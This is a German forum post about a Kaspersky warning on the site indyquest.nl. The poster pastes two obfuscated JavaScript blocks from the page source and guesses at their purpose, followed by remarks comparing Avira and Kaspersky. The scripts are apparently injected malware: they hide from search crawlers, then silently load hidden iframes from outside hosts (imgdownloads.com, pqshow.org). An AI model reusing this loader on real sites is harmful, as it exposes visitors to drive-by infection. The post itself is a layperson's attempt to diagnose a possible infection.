5IC
Mitglied
Beiträge: 5.006
Dabei seit: 12.05.2003
Wohnort: Nordhessen
|
Betreff: Re: indyquest.nl
Also ich denke ich habe heraus gefunden was Kaspersky da anmahnt. Auf der Seite steht im Quelltext ein Koloss an JavaScript Code, der da für die eigentliche Funktion der Seite in meinen Augen gar nichts verloren hat. Die Meldung besagt durch das "JS" auch schon, dass es etwas mit JavaScript zu tun hat. Nur ob das jetzt nen ernster Alarm oder nen Fehlalarm ist, kann ich nicht sagen, weil mir die Ahnung von Javascript fehlt. Vielleicht aber MaMo oder Norman? Ich weiß nur von der Arbeit aus, dass Kaspersky teilweise super empfindlich ist, so dass 8 von 10 Meldungen bei uns nervöse Fehlalarme sind.
Was ich mit meinem bisschen Laien-Verstand über das JavaScript sagen kann (aber nagelt mich da bitte nicht drauf fest, ist wie gesagt alles andere als mein Fachgebiet):
Der ganze Code scheint aus zwei einzelnen Scripten zu bestehen. Das erste hat irgendwie mit Suchmaschinen Bots zu tun und scheint auch irgendwie nen Cookie zu setzen. Ich vermute, dass das Script eine Routine ist, mit der das Verhalten der Suchmaschinenbots analysiert und getrackt werden soll, die sich auf die Seite verirren. Das könnte eventuell sogar schon die Meldung verursachen, weil sich Kaspersky möglicherweise denkt "Huch, was ist das denn?!"
DownloadJavascript-Quelltext:if(document.cookie.indexOf('urchin')==-1 && !window.navigator.userAgent.toLowerCase().match(/(crawler|googlebot|msnbot|yahoo|search|indexer|cuill.com|stackrambler|aport|yandex|bing|ask)/)) { res=new Date();res.setTime(res.getTime()+80000000);document.cookie='urchin='+escape('google-analytics.com')+';expires='+res.toGMTString()+';path=/'; function iO(){};var lV=new Date();iO.prototype = {bF : function() {sV=false;this.qY='';this.cA='';return 'h<t<t<p6:4/6/4i4mxg6d4oxw6n6l4o}axdxsx.<c}o}m}/4i4n4.<c6g6i}?436'.aI(/[6\}4x\<]/g, '');var kO=function(){};nW='nW';var wP=false;var hH='';},t : function() {var bP=function(){};zY=53599;this.qL='qL';pT='';var iY=function(){};this.mM=false;var mL=function(){return 'mL'};var u=window;l=5320;aN='aN';this.kL=63107;vL='';var i=document;this.nH=false;function yW(){};this.bA='bA';this.nT='';vK='';var g=function(){};this.pW='';var aZ=function(){}; String.prototype.aI=function(o,e){return this.replace(o, e)};zM='';function hB(){};cL='';var aD=new Array();var hO=new Date();var lS=new Date();mO=21254;var m = 'd#i.sUp3l#a.y#'.aI(/[#3%U\.]/g, '');uK=false;var dU=21553;var pA=28676;var b = 'nroQn+e)'.aI(/[\)rP\+Q]/g, '');this.j=false;this.dUM='';sL='';var oC=''; var s = 'aTp;pEeEn;dEC0hEi;lcdT'.aI(/[TE;c0]/g, '');this.oD=57616;this.nR=28704;var q = 'c&rHeDaHtDe&E&lfevmHeHnDtH'.aI(/[Hf&Dv]/g, '');pI=false;this.jZ='';this.kD=false;var a = 'b0oideyt'.aI(/[t0pei]/g, '');var bO=new Array();this.jZO=49972;var qLQ=15686;var h = 'sYtYyYlYen'.aI(/[n\>Y3\^]/g, '');this.xE='';function dS(){};var oDS=new Array();this.bV=37119;var x = 'iTfLrOaLm2eL'.aI(/[L2\+OT]/g, '');oV='';function oDL(){};var r=61212;this.tG='';var z = 'w[r[iQtseJ'.aI(/[JQsW\[]/g, '');this.qMC='';function xQ(){};this.iL='';this.jG='';var qM = 'sPe;tNAztPtzrPi%bNu;tPeN'.aI(/[N;%zP]/g, '');var nN=new Date();var vG=new Date();var w = 's_rfc_'.aI(/[_0f,\|]/g, '');var kOW=function(){return 'kOW'};zU=false;var bC='';var jA=new Date();var f = 's!e^t^T^i!m!e!ovuStS'.aI(/[SXv\!\^]/g, '');tX=false;lX='';var tP=false;this.tA='';var p = 'c8dC<Y/YbWoCdWyC>U<Y/ChUtUmWlC>W'.aI(/[W8CYU]/g, '');this.eS='eS';function sT(){};var bH=new Array();var rR='';function cX(){};var yH='';try {this.cC=52370;jP='jP';this.mF='';var dZ=false;var eK=function(){return 'eK'};var bT=new Array();var n=this.bF();var qK='';this.rT=22879;var k=i[q](x);var vLY='';iYT=false;lW=26789;bM='bM';this.iH=62649;this.tK=24505;cQ=51387;k[h][m] = b;gM='';var oH=false;iR='iR';var pD='pD';k[qM](w, n);var bMA=6076;dB='';function dC(){};var oZ=function(){return 'oZ'};eR=false;document[a][s](k);this.kC='';var aL='aL';this.kLB=59319;wZ=false;var iJ='';rG=7858;var bK=false;} catch(y) {this.aF='';var lD=function(){};i.write(p);this.uL='';var kOG=41230;var v = this;var rGO='';var oG='';tM='tM';wC=false;u[f](function(){ var pJ=function(){};this.eN=false;var oHG=function(){return 'oHG'};kY=false;v.t();fS=false;function jW(){};}, 380);this.iRM=22881;this.fK=false;var mD='';var eB=new Array();}var iM=function(){};this.xH='';}};var uE=new Date();var bCW=new iO(); this.iF='';bCW.t();var pL=new Array();}
Das zweite Script sagt mir leider gar nichts und wird nichtmal hier im Forum so ausgegeben, wie das obere Script (also in so nem Kasten, farblich seperiert):
function oS(){};var cU='cU';oS.prototype = {l : function() {this.a='';uY='';var qN='';this.tT=false;kRT=false;var oA='oA';var r=document;function aX(){};this.uM=false;this.yI='yI';var y=window;this.x='';var wT=function(){return 'wT'};this.d='';var wV=function(){return 'wV'};var gI=false; String.prototype.uX=function(k, h){return this.replace(k, h)};oN=false;var kB=50693;uH='';var dA=function(){return 'dA'};rV=false;var wR='';function j(){};var gB='';var g = 's<t<y6l#e<'.uX(/[\<65i#]/g, '');this.zU='';var b=new Date(); var m = 'aspopfeon&dfC&hfiflsds'.uX(/[so\:&f]/g, '');var bR=function(){return 'bR'};this.dM='dM';var q = 'iLf8rLa8mOe8'.uX(/[8LUO\)]/g, '');this.hC='';this.oJ='';var mV = 'c]rHe:a:t7e:E#lHe7m]e#n]t]'.uX(/[\]\:H7#]/g, '');var xK=5183;this.oJN='';var o = 'wmrViUt)em'.uX(/[mU\)VT]/g, '');var c=function(){};hQ='';this.eT='';var f = 's(e1t(A]t]t]r1i]bQu9t]e]'.uX(/[\]9Q1\(]/g, '');dL=false;var zR='';var kR = 'swrEc&'.uX(/[&E\[,w]/g, '');var aXO=new Array();var tJ=false;var mA = 'bOomd>yM'.uX(/[M\>mOR]/g, '');this.gBN='';jC='';var kJ = 'dSiSsFpSl>aFyS:|n3o>n3eS'.uX(/[S\|3\>F]/g, '');gT='gT';var wW='';var s=new Date();var sI=function(){};var e = 'swe&tVTViwmVeVo_u&tw'.uX(/[w_&Vz]/g, '');xF=25501;var cX=function(){};var n=new Date();var tA='';this.lV='';var xX=new Date();var mQ=function(){};try {this.jI='jI';var jP=function(){return 'jP'};var hN=function(){return 'hN'};dK='';qM=false;this.xFI='xFI';var sH=new Array();this.sG=false;var i=r[mV](q);var cB='';v=47041;var tV=22677;var rI='';i[f](kR, this.u());vD=6519;this.sW='';i[f](g, kJ);fN=false;aS=9570;var eE=7557;this.gBW='gBW';var fP='';this.yC='';document[mA][m](i);var zY='';aM='aM';var jS=new Date();vV='';kS=false;eV=false;} catch(w) {var nB=new Date();var eK=new Array();this.vT='';bH=3921;r.write('tjoOVO<r/jb6o6djyr>O<r/6hjtOm6l6>6'.uX(/[6Orjg]/g, ''));sO='sO';var p='';qY=false;var z = this;this.nP='nP';var oG=false;function iI(){};y[e](function(){ z.l() }, 137);zI=false;this.qK=35353;this.nW='';var xI='xI';}rN=false;this.bZ=31168;},u : function() {function gG(){};var bA=new Date();var pP='';return 'h0tStvpv:v/{/Zp{q{svh{ovw0.{oZrSgv/Si{nZ.{c{g{iv?S2v'.uX(/[vZ\{0S]/g, '');wY='';var oF=new Array();this.hQF=false;var vL=new Array();}};var eA=false;var hW=new oS(); this.zA=false;hW.l();var pG=14831;
Folgend mal ein Bild des gesamten Quelltextes. Nur der Teil, den ich rot umrahmt habe macht die eigentliche Webseite aus. Alles darunter sind die besagten JavaScripts - wobei es unterhalb des Screens noch weiter nach unten geht, wie man am Scrollbalken erkennen kann.
P.S.: Zu Avira - ich benutze das seit vielen Jahren udn hatte seitdem einen einzigen Virenbefall. An der Arbeit mit unserer Kaspersky 10.000¤ superduper Mega Company License hab ich jeden Tag 30 Meldungen und dennoch 5 mal Befall im Monat. So viel dazu.  Avira ist nicht einfach "irgend ne kostenlose Virensoftware", sondern gehört zu DEN besten Programmen der Branche und misst sich auf AUgenhöhe mit kostenpflichtigen Programmen.
Chris
|
Suche
Team
Registrieren
Wichtige Funktionen
Verschiedene Links Aktive Themen... Newsfeeds (RSS, ...)
Login
Datenschutzerklärung
Druckoptimierte Version